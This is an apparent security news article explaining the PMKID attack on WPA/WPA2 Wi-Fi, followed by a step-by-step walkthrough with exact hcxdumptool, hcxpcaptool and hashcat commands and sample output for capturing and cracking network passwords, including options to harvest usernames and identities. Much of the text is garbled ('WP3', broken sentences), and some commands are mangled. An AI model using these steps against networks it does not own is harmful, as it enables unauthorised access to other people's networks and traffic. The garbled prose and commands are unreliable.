2019 New Method for cracking WPA WPA2 PSK to access WiFi network passwords

A New Wifi Hack

The new WPA / WPA2 cracking method has enabled WiFi networks that allow attackers to access pre-shared key hash that used to crack target victims ‘ passwords.

This method was discovered during the attack against the recently released WPA3 security standard, which is extremely difficult to crack since the modern key establishment protocol Simultaneous Authentication of Equals (SAE) was used.

New WP3 security standard released by the Wi – Fi Alliance, which provides Wi – Fi security for the next generation with new capabilities to enhance both personal and enterprise networks and the new WP3 security standard, which is a successor to WPA2.

This attack is found by the researcher to compromise the WPA / WPA2 password without an EAPOL 4-way handshake. According to Steube, the developer of the Hashcat password cracking tool, the new attack is carried out on the RSN IE of a single EAPOL frame.

This attack also works against all 802.11i / p / q / r roaming networks, and it is not clear how many vendors and routers this technique will work.

How does this WPA / WPA2 WiFi Password Attack Works

Robust Security Network Information Element (RSN IE) works in 802.11 management frames and in a single EAPOL framework.

When the user attempts to authenticate with the router, the Pairwise Master Key ID (PMKID) can be captured from the RSN IE. ” We can see here that the PMKID is captured using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of the fixed string label ” PMK Name, ” the MAC address of the access point and the MAC address of the station.”

To use this new attack, the following tools are required:

1. hcxdumptool V4.2.0 or higher
2. hcxtools V4.2.0 or higher
3. Hashcat v4.2.0 or higher

Step 1
First Run hcxdumptool to retrieve the AP PMKID and dump the PCAP file using the following code.
$./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable status

The output looks like this:

Start capturing (stop with ctrl+c)
INTERFACE:……………: wlp39s0f3u4u5
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL:

10 beacons GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER…………: 62083
ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Step 2
Run next tool called hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat using following code.

$./hcxpcaptool-z test.16800test.pcapng
The file content will look like this and it will be divided into four columns.

PMKID* MAC AP* MAC Station* ESSID
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4
*ed487162465a774bfba60eb603a39f3a

It is also recommended that options
-E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
-I retrieve identities from WiFi-traffic
-U retrieve usernames from WiFi-traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Step 3

Finally, run hashcat to crack it, we must use the PMKID-16800 hash mode and we can use this hash as any other hash type.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

Finally, it cracked the hash WPA-PMKID-PBKDF2

In order to gain access to the PMKID, this new attack simply has to try to authenticate the wireless network later.
This method is also much easier to access the hash containing the pre-shared key and the hash will be cracked later, although this attack is not very complex due to the complexity of the password.

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.